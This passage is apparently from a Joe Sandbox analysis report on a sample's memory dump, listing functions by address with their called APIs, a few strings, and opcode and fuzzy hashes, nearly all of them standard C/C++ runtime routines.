Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: b8193f6d4505b1676574f9fc5b1f1019d7545f143862515be7bb8b918f8df2db
Instruction ID: 6f47882151d23bbb91621c2a1358d9b6e4dd15379615ad4e400fdfd1a621db72
Opcode Fuzzy Hash: b8193f6d4505b1676574f9fc5b1f1019d7545f143862515be7bb8b918f8df2db
Instruction Fuzzy Hash: CCE01AB0384204BAEF201B64EC4AB6D3B95EF55B91F1804B0FA4CA84E0EB71EC509944

Function 00B93F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B94001

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B94253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B94299
GetLastError.KERNEL32 ref: 00B9433C

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 269c26ed0b467c2cd546d79ba3997d47fcfb0368c9c70411b247577cc4cee03c
Instruction ID: b108fdeb7b60fd07ec90c702c9ac0db6699f8f6b259aa70187f34aa861e586d5
Opcode Fuzzy Hash: 269c26ed0b467c2cd546d79ba3997d47fcfb0368c9c70411b247577cc4cee03c
Instruction Fuzzy Hash: 01D127B5D042589FCF15CFA8C880AADBBF5FF09314F2845AAE556EB251DB30A942CB50

Function 00B8B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00B8B35C
___AdjustPointer.LIBCMT ref: 00B8B37F
___AdjustPointer.LIBCMT ref: 00B8B41B

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 38c656cba9b00c8d3ab6ba73f5070802dcc74d1f49c7efef628e782d8aad5764
Instruction ID: a275861e683b45c4c146206f8640dbb4441df37a38913a13340c793ca16b4da9
Opcode Fuzzy Hash: 38c656cba9b00c8d3ab6ba73f5070802dcc74d1f49c7efef628e782d8aad5764
Instruction Fuzzy Hash: 4151D072A04606EFDB29AF70C891FAA77E4EF00710F1440ADE916572B1E731EC80CB94

Function 00B77220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B772C5
std::_Throw_Cpp_error.LIBCPMT ref: 00B77395
std::_Throw_Cpp_error.LIBCPMT ref: 00B773A3
std::_Throw_Cpp_error.LIBCPMT ref: 00B773B1

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 412cc726bcc5b7482ab9b277b15882dcd0b3880b322f267d0023ede442dc93d7
Instruction ID: b044851cc6f9d658d1f8d01006dbbbe587f0848153074f6d84894dba9bcbf5f7
Opcode Fuzzy Hash: 412cc726bcc5b7482ab9b277b15882dcd0b3880b322f267d0023ede442dc93d7
Instruction Fuzzy Hash: EA41D2B19447058BDB20DB24C881B6EB7E4FF44320F15C6B9D83E5B691EB34E811CB95

Function 00B74460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B74495
std::_Lockit::_Lockit.LIBCPMT ref: 00B744B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00B744D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00B74580

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: f0c03f8cd6c71c588b6e8b71b4811f79193d6107e2e26c916033c6df6ccb5910
Instruction ID: 58b1d1bf007dac8f0968451af258e4fcd10bd3b4b6be2d6d4e9105185468f244
Opcode Fuzzy Hash: f0c03f8cd6c71c588b6e8b71b4811f79193d6107e2e26c916033c6df6ccb5910
Instruction Fuzzy Hash: 2C414B71D002198FCB10DF94D845BAEBBF0FB99721F1482A9E82967391DB34AD44CF91

Function 00B91DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B91E2A
__dosmaperr.LIBCMT ref: 00B91E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B91E6B
__dosmaperr.LIBCMT ref: 00B91E72

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: b3ee0fe2ad77eb4f18c247035a684821c0d3baedac77ee87f4256324f1d0a858
Instruction ID: a0a6891b6bf4b3d54d2cff3bc57d86224bf195eb3cd2ab27109abae1cbcef5b5
Opcode Fuzzy Hash: b3ee0fe2ad77eb4f18c247035a684821c0d3baedac77ee87f4256324f1d0a858
Instruction Fuzzy Hash: C0218371604616AF9F21AF69888196BB7E9FF0536471089F9FC1997151EB30EC01EBA0

Function 00B82BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056d09b46f894e976b9956ab3138eb626b20cfba10c9ae0d0b4ac6fb5574d326
Instruction ID: 900c8ce65108160faa1d32946f243ebe9f09508e190b1b9f0cacafe596e20f80
Opcode Fuzzy Hash: 056d09b46f894e976b9956ab3138eb626b20cfba10c9ae0d0b4ac6fb5574d326
Instruction Fuzzy Hash: ED216D71204215AFDB21BF65CD8197A7BE9FF40364B244599F86597271EB30EC40DBA0

Function 00B931BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B931C6

Part of subcall function 00B8C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B8D895,?,00000000,-00000008), ref: 00B8C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B931FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B9321E

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: a28dcdd34d1a04e5c918fb39826bda31aae609b5b395890812a6c7c2e6e946a1
Instruction ID: d5b86eff0b5c2f704cde0d91b7f305c931a14b440f1ec87a91bf822658a2db14
Opcode Fuzzy Hash: a28dcdd34d1a04e5c918fb39826bda31aae609b5b395890812a6c7c2e6e946a1
Instruction Fuzzy Hash: 811180F15015157EAB223BB55CCACBF7EDCDE96BA571404A4FA0592111FF64DF0082B1

Function 00B7E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B7E899
std::_Lockit::_Lockit.LIBCPMT ref: 00B7E8A3
int.LIBCPMT ref: 00B7E8BA

Part of subcall function 00B7C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B7C1F6
Part of subcall function 00B7C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B7C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00B7E914

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 09b5ba30a6827d6f0195a463e352d9ec8602fe050011b270edadd68c8ff391f0
Instruction ID: b6607658832b42e7e90fdaac76e2998196b15f95e4227b6f1bd722c840070081
Opcode Fuzzy Hash: 09b5ba30a6827d6f0195a463e352d9ec8602fe050011b270edadd68c8ff391f0
Instruction Fuzzy Hash: 4711E532804115DBCF05EBA4C95567E7BF1AF88710F2480D8F4396B281CF309E00CB81

Function 00B9ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000), ref: 00B9ADB7
GetLastError.KERNEL32(?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?,?,?,00B93CD6,00000000), ref: 00B9ADC3

Part of subcall function 00B9AE20: CloseHandle.KERNEL32(FFFFFFFE,00B9ADD3,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?,?), ref: 00B9AE30

___initconout.LIBCMT ref: 00B9ADD3

Part of subcall function 00B9ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B9AD91,00B9A2DC,?,?,00B94390,?,00000000,00000000,?), ref: 00B9AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B9A2EF,00000000,00000001,00000000,?,?,00B94390,?,00000000,00000000,?), ref: 00B9ADE8

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0bede8ca424c37b4ec282c4841fcd73970bbbf58c9221561f7f07ecfb904063b
Instruction ID: 29cbe4bc9b72a652a30cf6fb0451bc4d02259d2f057698cf5885ecdc4f697c34
Opcode Fuzzy Hash: 0bede8ca424c37b4ec282c4841fcd73970bbbf58c9221561f7f07ecfb904063b
Instruction Fuzzy Hash: 43F0AC36514119BBCF221FD5DC09A9A7F66FF497A1B144071FE1996130DB328C60ABD1

Function 00B804F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B80507
GetCurrentThreadId.KERNEL32 ref: 00B80516
GetCurrentProcessId.KERNEL32 ref: 00B8051F
QueryPerformanceCounter.KERNEL32(?), ref: 00B8052C

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 64cc2d8b123e9f12abd8aae4a1dc4cd18afadba8183d22f0c33860965422cc52
Instruction ID: a1e6d92dcec3bd6cb6ba3a6c2745c1ecde3fceb790ad8870111c72a331e2b361
Opcode Fuzzy Hash: 64cc2d8b123e9f12abd8aae4a1dc4cd18afadba8183d22f0c33860965422cc52
Instruction Fuzzy Hash: 62F062B4D1020DEBCB00DFB4DA4999EBBF4FF1D200B9549A5E452E7110EB30AB449B50

Function 00B90976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00B8C16A: GetLastError.KERNEL32(00000000,?,00B8E58D), ref: 00B8C16E
Part of subcall function 00B8C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00B88363), ref: 00B8C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00B85BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00B90A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00B85BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00B90A6C

Strings

utf8, xrefs: 00B90B3E

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: f2a5e7eb49635f2bb2872a7ae8713b756fa23d75e5bd58f5ee7e700ab002cad5
Instruction ID: effc823f0bf5d0390aa0c34c82a071ec16fd831188866ce0ca600179402e4ae3
Opcode Fuzzy Hash: f2a5e7eb49635f2bb2872a7ae8713b756fa23d75e5bd58f5ee7e700ab002cad5
Instruction Fuzzy Hash: EC51D572624305AEDF24BB358C82FBA73E8EF05714F1444F9F54997182E670E980C7A5

Function 00B773E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B77526
___std_exception_copy.LIBVCRUNTIME ref: 00B77561

Part of subcall function 00B7AF37: CreateThreadpoolWork.KERNEL32(00B7B060,00B78A2A,00000000,00000000,?,00B78A2A,?,?,?,?), ref: 00B7AF46
Part of subcall function 00B7AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00B7AF53

Strings

Fail to schedule the chore!, xrefs: 00B77551, 00B77560

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: c017ae3abe5d5221c4387220d9c3621961146184fbb280128d186db5ac8fddca
Instruction ID: c0322cbcfaec510b33a5b816d4694254bfe795684aed61b288b82c528e7b09bc
Opcode Fuzzy Hash: c017ae3abe5d5221c4387220d9c3621961146184fbb280128d186db5ac8fddca
Instruction Fuzzy Hash: DD518CB1900208DFCB04DF54D885BAEBBF0FF48314F1881A9E829AB391DB75A905CF91

Function 00B8B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B8B893,?,?,00000000,00000000,00000000,?), ref: 00B8B9B7

Strings

RCC, xrefs: 00B8B9D1
MOC, xrefs: 00B8B9C9

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 8ef8252cf86e6f3a9d970e56e3138754fece1193cb4b4cd72f80d7a84b4bbcfe
Instruction ID: 322997b495d1d1214d5417ba28149d6801e2cde20155e7c3164766c0e317476e
Opcode Fuzzy Hash: 8ef8252cf86e6f3a9d970e56e3138754fece1193cb4b4cd72f80d7a84b4bbcfe
Instruction Fuzzy Hash: A0414A71900209AFCF19EFA4CC81EAEBBF5FF48300F188199F91467222D7359950DB51

Function 00B73E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B73EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00B74002

Part of subcall function 00B7ABC5: _Yarn.LIBCPMT ref: 00B7ABE5
Part of subcall function 00B7ABC5: _Yarn.LIBCPMT ref: 00B7AC09

Strings

bad locale name, xrefs: 00B73F46

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: f4dbee2005e82a558a727fee5598066b35070b4f429e280a9410d51ce98e1501
Instruction ID: f7b4458868a48f96cf0cfdf51927777dca0f40817e1f8b31ba933e53b840941c
Opcode Fuzzy Hash: f4dbee2005e82a558a727fee5598066b35070b4f429e280a9410d51ce98e1501
Instruction Fuzzy Hash: BA418EF0A007459BEB10DF69C805B1BBBF8BF04B14F044668E4599B781E37AE518CBE2

Function 00B8B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B8B475

Strings

csm, xrefs: 00B8B497
csm, xrefs: 00B8B508

Memory Dump Source

Source File: 00000003.00000002.2032385094.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000003.00000002.2032369312.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032408678.0000000000B9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032430921.0000000000BAA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032458243.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032520814.0000000000BB2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2032626463.0000000000BFE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b70000_0x001f00000004676d-1858.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 2397d1319b14a3f6328ac4b65e70ee84eb5ff1a55b6962462c8b8ca87f810661
Instruction ID: bdcb906ff9e53c33ed9b2eb7f7e11dc47d3f427084da7d15f7b684ef6cfff53f
Opcode Fuzzy Hash: 2397d1319b14a3f6328ac4b65e70ee84eb5ff1a55b6962462c8b8ca87f810661
Instruction Fuzzy Hash: 3131C671410215EBCF26AF60CC51CEA7BE6FF19315B1846DAF85549232C332DD61DB81

Function 00B7B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B7B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00B7B8DE

